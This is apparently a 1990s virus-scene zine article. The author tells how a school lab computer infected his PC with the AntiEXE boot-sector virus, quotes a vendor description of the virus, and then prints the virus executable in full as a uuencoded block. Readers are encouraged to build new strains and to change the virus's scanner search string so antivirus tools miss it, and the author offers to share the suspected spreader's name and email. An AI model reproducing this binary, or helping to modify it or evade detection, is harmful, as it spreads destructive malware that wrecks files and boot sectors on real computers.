			Who was that Asshole?
			---------------------


	Well, the story is this.   I was at school sitting in the 
	Computer Lab, hacking the network :-) when suddenly I noticed
	this directory called virus on the harddrive.  This made me 
	curious.  I checked, and inside the directory there was an
	AV program called Dr. Web.  I ran the Program and it detected the 
	AntiEXE virus in memory and in the Boot Sector.  So I copied the 
	prog. thinking this might be useful.  Then at home I scanned my 
	computer and I also found the AntiEXE infection.  But to my surprise
	the virus had just trashed a few exe files on my HD.  That was the 
	second that I realised that I must have gotten this virus of of 
	the school computer from some asshole who didn't know what he
	was doing or did it on purpose.  BY now I have figured out the
	guy's name and E-Mail address.  I will gladly send it to you if 
	you want.  For this issue I have included the COM of the 
	virus(uuencoded*) and a description of it.  I will support anybody who wants 
	to make a new strain of this virus, etc.  But remember, don't make
	the virus do any more damage then it does already, because I usually
	don't support malacious coding.

	Well, here it is:

		The AntiEXE Virus

Description(info stolen from Stiller Research):

AntiEXE
  Aliases:   D3
  Synopsis:  Destructive, resident DOS boot sector and partition sector virus<br>
  Damage:    Inadvertent damage to diskette files and deliberate damage to .EXE files<br>
  Symptoms:  Damaged files, less total memory and PC hangs<br>
  Details:
  AntiEXE deliberately damages .EXE files by changing the first byte of
  the file.  Like Stoned, it will cause damage to any infected floppy
  that contains more than just a few files.  This virus is memory
  resident and will infect any floppy accessed. AntiEXE remaps the disk
  interrupt (Int 13h) to avoid resident monitoring programs but has no
  stealth capabilities.


* UUencoding and decoding program included with this issue!
	
				Cut Out Here
---------------------------------------------------------------------------
begin 644 antiexe.com
MZ10!30,``5,U+C```@(!``)P`-`"_0(`"0`"````35I``(@!-P_@@/SY=%(N
MHP<`S=-R2IPN@#X(``)U0%%65QXKR8[9]@9L!`-T(`X?B_N--AX`N0@`5_.F
M7W0.@<<``B[^#@<`=>CK`I"J'U]>68/Y`74(@/X`=0/H!`"=R@(`4%-14AX&
M5E<&'RZA```[!W48+J$"`#M'`G4/BX\$`(JW!@"X`0+-T^MC@/H!=UZ+1Q;V
M9Q`#1PY2L02+5Q'3Z@/"2(M/&%'1X2O2]_%94(O"*]+W\8KPBLI8BNC^P5B*
MT"Z(-@8`+HD.!`"X`0/-TW(;#@?\OP<`B_,#][D7`/.DN`$#,]NY`0`J]LW3
M7UX''UI96UC#,_^.W\063`")%DP#C`9.`_J.U[X`?(OF^QY65J$3!$BC$P2Q
M!M/@CL"C3@#'!DP`)P!0N%4!4+D``?SSI<LSP([`S=,.'[@!`EN+#@0`@_D-
M=0:Z@`#-T\LKTHHV!@#-TW+U#@>X`0*[``*Y`0"Z@`#-TW+C,_:M.P=U!JT[
M1P)TUKD-`(D.!`"X`0-0S=-8<L:^O@._O@&Y(0#SI4$KVX@V!@#-T\N``0$`
M!`.:91H```!6^0``````````````````````````````````````````````
1````````````````````5:H`
`
end

----------------------------------------------------------------------------
So take a look at the prog and try to find the search-string and change it. 